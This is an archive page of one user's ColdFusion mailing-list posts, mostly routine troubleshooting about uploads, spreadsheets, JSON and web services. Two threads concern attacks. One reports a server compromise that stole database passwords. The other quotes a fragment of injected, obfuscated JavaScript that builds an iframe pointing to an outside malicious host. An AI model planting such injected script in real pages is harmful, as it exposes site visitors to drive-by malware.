Re: bizarre cffile upload bug.

2012-05-08 Thread Ras Tafari
the file is written as a 103kb file both ways, its ftp'd up, as the same size. cffile through chrome (beta) = no dice cffile through safari = workie workie as i said, gonna test more this am. On Mon, May 7, 2012 at 11:57 PM, Dave Watts dwa...@figleaf.com wrote: I must assume that the beta

Re: bizarre cffile upload bug.

2012-05-08 Thread Ras Tafari
:) dude. seriously. the controller has no play in this, the controller merely does the sql insertion of the record that yes a file has been uploaded, here is its name, publish date, etc. this piece is behind the site, in the /admin area. there's no VIEWING of the pdf back there just uploading

Re: bizarre cffile upload bug.

2012-05-08 Thread Ras Tafari
so, I made a simple test case :) and it worked in chrome. so, maybe the cflocation (back to the you've succeeded page) that is after the cffile tag would make the file not correct, and corrupt?? weird. weird. tw On Tue, May 8, 2012 at 8:31 AM, Ras Tafari rastaf...@gmail.com wrote: :) dude

Re: bizarre cffile upload bug.

2012-05-08 Thread Ras Tafari
well, my dear watt's-son :) im perplexed, but ill tinker with it later. take'er easy! On Tue, May 8, 2012 at 10:15 AM, Dave Watts dwa...@figleaf.com wrote: so, I made a simple test case :) and it worked in chrome. http://www.youtube.com/watch?feature=player_detailpagev=cCI18qAoKq4#t=59s

Re: bizarre cffile upload bug.

2012-05-07 Thread Ras Tafari
bad guess amigo :) but seriously, I'm merely hitting a method in my main controller that does stuff for this site. works in safari 100% of the time!!! just not chrome. weird. cftry

Re: CF attack on a buddies server

2012-03-05 Thread Ras Tafari
thanks pete, i just saw this reply. ill show him and my people at work :) cf-ras On Fri, Feb 24, 2012 at 2:44 PM, Pete Freitag p...@foundeo.com wrote: On Thu, Feb 23, 2012 at 7:39 PM, James Holmes james.hol...@gmail.comwrote: This would confirm which patches are missing:

CF attack on a buddies server

2012-02-22 Thread Ras Tafari
hey guys. this code was somehow dropped into my friends cfide directory and ran, did lots of bad things, stole db passwords, changed his cf code, etc. http://pastebin.com/Jg2Cs0ch any idea how to protect from this kinda attack? thanks! cf-ras

Re: CF attack on a buddies server

2012-02-22 Thread Ras Tafari
here's the code again incase pastebin killed that link http://pastebin.com/qvBTEP50 On Wed, Feb 22, 2012 at 11:12 AM, Dave Watts dwa...@figleaf.com wrote: this code was somehow dropped into my friends cfide directory and ran, did lots of bad things, stole db passwords, changed his cf code,

Re: CF attack on a buddies server

2012-02-22 Thread Ras Tafari
, and more if possible. -- Pete Freitag - Adobe Community Professional http://foundeo.com/ - ColdFusion Consulting Products http://petefreitag.com/ - My Blog http://hackmycf.com - Is your ColdFusion Server Secure? On Wed, Feb 22, 2012 at 11:31 AM, Ras Tafari rastaf...@gmail.com wrote

bing route webservice from cf

2011-11-22 Thread Ras Tafari
big up. anyone have any experience hitting the bing routeRequest method from CF? thanks cf-ras ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion

Re: cf9 multiple sheet excel

2011-08-02 Thread Ras Tafari
has anyone figured out how to add comments to a cell? i cannot make it work without breaking and causing a 500 server error. ras On Mon, Aug 1, 2011 at 3:44 PM, Captain Obvious mr.happ...@gmail.com wrote: Tried that (specifying XML in filenme attribute of cfheader tag) but Excel 2010

Re: cf9 multiple sheet excel

2011-08-02 Thread Ras Tafari
here is what im trying: cfset spreadsheetSetCellComment(request.myDoc, This is a comment, 1, 1) / :) sadly, its as simple as that, and not working. rest of my code to create the spreadsheet is a-ok and working just fine. just adding comments to a cell is breaking. tw On Tue, Aug 2, 2011 at

Re: cf9 multiple sheet excel

2011-08-02 Thread Ras Tafari
in other words RTFM :) lol thanks! tony On Tue, Aug 2, 2011 at 2:09 PM, Leigh cfsearch...@yahoo.com wrote: Comments should be a structure, not a string ;-) http://help.adobe.com/en_US/ColdFusion/9.0/CFMLRef/WSc3ff6d0ea77859461172e0811cbec22c24-6733.html

Re: cf9 multiple sheet excel

2011-08-02 Thread Ras Tafari
true :) either way, thanks for pointing out the obvious to me... it was late when i was trying, and just missed the structure part! On Tue, Aug 2, 2011 at 2:19 PM, Leigh cfsearch...@yahoo.com wrote: in other words RTFM :) LOL. Well I try to be courteous, so there is a please in there too

Re: dbvarname mssql cf8?

2011-06-21 Thread Ras Tafari
wow, thanks. i had no idea :) lol, the subject was more indicative of what my question was... whats up with dbvarname and named parameters in cf8/9? doesnt seem to work (out of the box)... is there a work around? tw On Tue, Jun 21, 2011 at 10:09 AM, Russ Michaels r...@michaels.me.uk wrote:

Re: dbvarname mssql cf8?

2011-06-21 Thread Ras Tafari
/groups/cf-talk/thread.cfm/threadid:49286 On Tue, Jun 21, 2011 at 3:15 PM, Ras Tafari rastaf...@gmail.com wrote: wow, thanks. i had no idea :) lol, the subject was more indicative of what my question was... whats up with dbvarname and named parameters in cf8/9? doesnt seem to work (out

Re: dbvarname mssql cf8?

2011-06-21 Thread Ras Tafari
that no longer supports named parameters, not just a random decision to stop supporting them. On Tue, Jun 21, 2011 at 11:24 AM, Ras Tafari rastaf...@gmail.com wrote: i know, i checked that too, this was my last hope... i did say work-around :( all good, not using cfstoredproc anymore, we are just

Re: SQL Query Problem

2011-06-21 Thread Ras Tafari
+420 On Tue, Jun 21, 2011 at 2:45 PM, Michael Grant mgr...@modus.bz wrote: Off topic, but the Select * made me shudder. On Tue, Jun 21, 2011 at 2:25 PM, Jenny Gavin-Wear jenn...@fasttrackonline.co.uk wrote: Looks like I went with the vote, lol Many thanks for all replies, and fast

Re: Form Field Validation - codon boundaries

2011-05-09 Thread Ras Tafari
i dont know how, but im going to say some regex work here would do the trick. On Mon, May 9, 2011 at 1:51 PM, Rick Colman rcol...@cox.net wrote: I should have provided more detail. This has to do with nucleotide strings in DNA. for example, consider the follow string: 123 456 789 act  

Re: serializeJson() oddity

2011-04-26 Thread Ras Tafari
doing that later today. thanks russ. tw On Tue, Apr 26, 2011 at 12:24 PM, Russ Michaels r...@michaels.me.uk wrote: http://kb2.adobe.com/cps/862/cpsid_86263.html There are a couple of JSON related bugs here. Do you have this update installed ? -- Russ Michaels

Re: serializeJson() oddity

2011-04-26 Thread Ras Tafari
i think so too, mark. testing that later today. On Tue, Apr 26, 2011 at 12:20 PM, Mark Drew mark.d...@gmail.com wrote: I think this is a bug with CF9, there is an updater (I think) that fixes this issue? Regards Mark Drew On 26 Apr 2011, at 16:45, Tony wrote: hi there. i have a

Re: Microblog

2011-04-25 Thread Ras Tafari
check out yammer? On Mon, Apr 25, 2011 at 8:10 AM, Glenn Hartong gl...@glickcf.com wrote: I'm looking for a microblog. Something Twitter-esque that I can use on a secure intranet. Users may share confidential information that cannot be on the web. Has anyone heard of anything like this?

Re: CF error with .Net webservice

2011-03-30 Thread Ras Tafari
ok. i think we are going crazy here. the little test works now. and i get this back Result value=2 / however, the REAL service i am trying to hit, is not working. and im getting this error back: i know what im SUPPS to get back... an xml string with parameters as well as values inside tags.

Re: CF error with .Net webservice

2011-03-30 Thread Ras Tafari
:) you are a charm. gracias! i went over the list at least 10 times. tw On Wed, Mar 30, 2011 at 3:42 PM, John M Bliss bliss.j...@gmail.com wrote: Looks like it's looking for 22 strings and you're passing 21, unless I'm counting wrong. and/or Try calling it like this: request.response

Re: application.cfc

2009-04-20 Thread Ras Tafari
id put it in an email rather than displaying, that way you knnow someone who isnt supps to see it is seeing it. but thats just me. On Mon, Apr 20, 2009 at 12:56 PM, Chad Gray cg...@careyweb.com wrote: Is it safe to put this code in the onError function? FORM Variablesbr / cfif

Re: OT Malware on a CF Site

2009-04-15 Thread Ras Tafari
wow. thats slick. On Wed, Apr 15, 2009 at 10:12 PM, Terry Troxel te...@it-werks.com wrote: Has anyone seen anything like this written to any of your sites? script!--       var applstrna0 = if;       var applstrna1 = rame src=http://said7;;       var applstrna2 = .com/bb/faq.htm;      

Re: coldfusion framework - i forget the name...

2009-04-14 Thread Ras Tafari
thank chow-lee, kinda interesting. im a framework-less kinda guy, but i have my own system i use, and its all cfc's and im interested in this one. tw On Mon, Apr 13, 2009 at 10:30 PM, Jake Pilgrim jpilg...@snapfitness.com wrote: Yes! Thanks!

Re: would you consider this a bug, CF8

2009-04-03 Thread Ras Tafari
but the end of months is a KNOWN thing, calculated out forever, look at rainmain. with that known constant of dates, it would be easy to code it such that anything end of month that asks for a incrementer of m would be easy to assume that. so, with that, id say a new incrementer of precise

Re: would you consider this a bug, CF8

2009-04-03 Thread Ras Tafari
), month(newdate), daysinmonth(newdate)),'mm/dd/')#br /  /cfloop  /cfoutput Azadi Saryev Sabai-dee.com http://www.sabai-dee.com/ Ras Tafari wrote: but the end of months is a KNOWN thing, calculated out forever, look at rainmain. with that known constant of dates, it would be easy

Re: .net cookies transfer to CF Session Values?

2009-04-02 Thread Ras Tafari
write them to javascript cookie vars, then yank them outta there into cf session variables cfRas On Thu, Apr 2, 2009 at 11:50 AM, Les Mizzell lesm...@bellsouth.net wrote: I've got a client that's decided to try and use a .net login system written for one of their sites for *all* their sites,